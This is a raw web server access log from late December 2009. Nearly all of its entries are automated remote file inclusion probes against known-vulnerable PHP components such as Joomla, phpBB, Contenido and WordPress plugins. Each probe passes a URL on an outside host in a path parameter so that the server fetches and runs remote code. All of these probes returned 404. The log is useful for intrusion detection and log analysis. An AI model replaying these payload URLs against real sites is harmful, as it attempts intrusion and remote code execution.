74.208.144.71 - - [28/Dec/2009:03:09:59 -0800] "GET /ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.144.71 - - [28/Dec/2009:03:09:59 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.144.71 - - [28/Dec/2009:03:09:59 -0800] "GET /logs/access_090629.log//ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.144.71 - - [28/Dec/2009:03:10:02 -0800] "GET /logs/access_090706.log//ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.144.71 - - [28/Dec/2009:03:10:04 -0800] "GET /ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.144.71 - - [28/Dec/2009:03:10:04 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.144.71 - - [28/Dec/2009:03:10:05 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.koisociety.net/uploads/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [28/Dec/2009:03:10:35 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [28/Dec/2009:03:10:35 -0800] "GET /logs//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.164.11 - - [28/Dec/2009:03:10:35 -0800] "GET /logs/access_090921.log%20%20//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.hipponantes-courses.com/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:03:12:05 -0800] "GET /_theme/breadcrumb.php?rootBase=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:03:14:09 -0800] "GET /logs/access_090706.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.125.211.42 - - [28/Dec/2009:03:17:30 -0800] "GET /xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [28/Dec/2009:03:23:05 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [28/Dec/2009:03:23:05 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [28/Dec/2009:03:23:05 -0800] "GET /logs/access.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.151.248.42 - - [28/Dec/2009:03:26:41 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:03:28:07 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.216.203.109 - - [28/Dec/2009:03:33:29 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [28/Dec/2009:03:37:29 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [28/Dec/2009:03:37:29 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [28/Dec/2009:03:37:29 -0800] "GET /logs/access_091221.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.15.85.21 - - [28/Dec/2009:03:38:20 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; SV1; .NET CLR 1.1.4322; HbTools 4.7.1)" "galf.org"
125.160.17.200 - - [28/Dec/2009:03:40:43 -0800] "GET /logs/access_090706.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:03:40:43 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:03:40:43 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:03:41:54 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:03:41:54 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:03:41:54 -0800] "GET /logs/access_090706.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.payandrelax.net/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:03:45:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:03:47:54 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:03:49:31 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:03:49:36 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:03:49:38 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
91.121.11.58 - - [28/Dec/2009:03:50:12 -0800] "GET /viewbody.html?code=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.11.58 - - [28/Dec/2009:03:50:12 -0800] "GET /logs/viewbody.html?code=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.11.58 - - [28/Dec/2009:03:50:12 -0800] "GET /logs/access_091005.log/viewbody.html?code=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.11.58 - - [28/Dec/2009:03:50:29 -0800] "GET /logs/access_090928.log/viewbody.html?code=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.11.58 - - [28/Dec/2009:03:50:47 -0800] "GET /viewbody.html?code=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.11.58 - - [28/Dec/2009:03:50:47 -0800] "GET /logs/viewbody.html?code=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.11.58 - - [28/Dec/2009:03:50:47 -0800] "GET /logs/access_091005.log/viewbody.html?code=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.150.128.81 - - [28/Dec/2009:03:51:44 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.150.128.81 - - [28/Dec/2009:03:51:44 -0800] "GET /logs/access_090706.log%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.150.128.81 - - [28/Dec/2009:03:51:44 -0800] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:03:52:01 -0800] "GET /logs/access_090928.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:03:52:05 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:03:52:10 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
91.121.11.58 - - [28/Dec/2009:03:52:35 -0800] "GET /logs/access_091005.log%20%20/viewbody.html?code=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.11.58 - - [28/Dec/2009:03:52:47 -0800] "GET /logs/access.log%20%20/viewbody.html?code=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.11.58 - - [28/Dec/2009:03:52:47 -0800] "GET /logs/viewbody.html?code=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.11.58 - - [28/Dec/2009:03:52:47 -0800] "GET /viewbody.html?code=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.151.248.42 - - [28/Dec/2009:03:52:50 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
91.121.11.58 - - [28/Dec/2009:03:53:49 -0800] "GET /logs/access_091005.log%20%20/viewbody.html?code=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.11.58 - - [28/Dec/2009:03:53:54 -0800] "GET /logs/access_090928.log%20%20/viewbody.html?code=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.77 - - [28/Dec/2009:03:54:43 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
209.150.128.81 - - [28/Dec/2009:03:55:10 -0800] "GET /logs/access_090629.log%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:03:56:22 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:03:57:34 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [28/Dec/2009:03:57:34 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.4.113.98 - - [28/Dec/2009:03:57:39 -0800] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.147.237 - - [28/Dec/2009:03:57:55 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.147.237 - - [28/Dec/2009:03:57:55 -0800] "GET /logs/access_090706.log%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:03:58:49 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:04:00:05 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.150.128.81 - - [28/Dec/2009:04:01:00 -0800] "GET /logs/access_090706.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:04:01:41 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dohio.org/joomla/media/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:04:01:41 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dohio.org/joomla/media/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:04:01:41 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dohio.org/joomla/media/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:04:01:45 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dohio.org/joomla/media/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
209.150.128.81 - - [28/Dec/2009:04:02:00 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.150.128.81 - - [28/Dec/2009:04:02:00 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.150.128.81 - - [28/Dec/2009:04:02:00 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.150.128.81 - - [28/Dec/2009:04:02:04 -0800] "GET /logs/access_090629.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.147.237 - - [28/Dec/2009:04:02:04 -0800] "GET /logs/access_090629.log%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:04:03:32 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:04:03:32 -0800] "GET /logs/access_090615.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:04:03:32 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:04:03:41 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:04:05:17 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.43.211.154 - - [28/Dec/2009:04:05:31 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dohio.org/joomla/media/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
208.43.211.154 - - [28/Dec/2009:04:05:31 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dohio.org/joomla/media/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:04:06:54 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
82.165.193.182 - - [28/Dec/2009:04:07:49 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.165.193.182 - - [28/Dec/2009:04:07:49 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.165.193.182 - - [28/Dec/2009:04:07:49 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.150.128.81 - - [28/Dec/2009:04:08:57 -0800] "GET /logs/access_091221.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.150.128.81 - - [28/Dec/2009:04:09:03 -0800] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.165.193.182 - - [28/Dec/2009:04:09:15 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://waynesed.com//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.147.237 - - [28/Dec/2009:04:09:49 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.147.237 - - [28/Dec/2009:04:09:49 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.147.237 - - [28/Dec/2009:04:09:49 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.mysteryshop.org/shoppers/resourcecenter/chatinc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:04:10:28 -0800] "GET /logs/access_090608.log%20%20/homepage.php?sel=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:04:10:28 -0800] "GET /homepage.php?sel=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:04:10:28 -0800] "GET /logs/homepage.php?sel=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:04:10:28 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:04:10:28 -0800] "GET /logs/access_090608.log%20%20/homepage.php?sel=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:04:10:28 -0800] "GET /homepage.php?sel=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:04:10:28 -0800] "GET /logs/homepage.php?sel=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.175.13 - - [28/Dec/2009:04:10:32 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:04:10:32 -0800] "GET /logs/access.log%20%20/homepage.php?sel=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:04:10:32 -0800] "GET /homepage.php?sel=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:04:10:32 -0800] "GET /logs/homepage.php?sel=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:04:10:33 -0800] "GET /homepage.php?sel=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:04:10:33 -0800] "GET /logs/access.log%20%20/homepage.php?sel=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [28/Dec/2009:04:10:33 -0800] "GET /logs/homepage.php?sel=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.160.17.200 - - [28/Dec/2009:04:10:58 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:04:10:58 -0800] "GET /logs/access_090713.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:04:10:58 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:04:10:59 -0800] "GET /logs/access_090831.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.43.211.154 - - [28/Dec/2009:04:11:00 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.dohio.org/joomla/media/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:04:11:03 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [28/Dec/2009:04:11:04 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
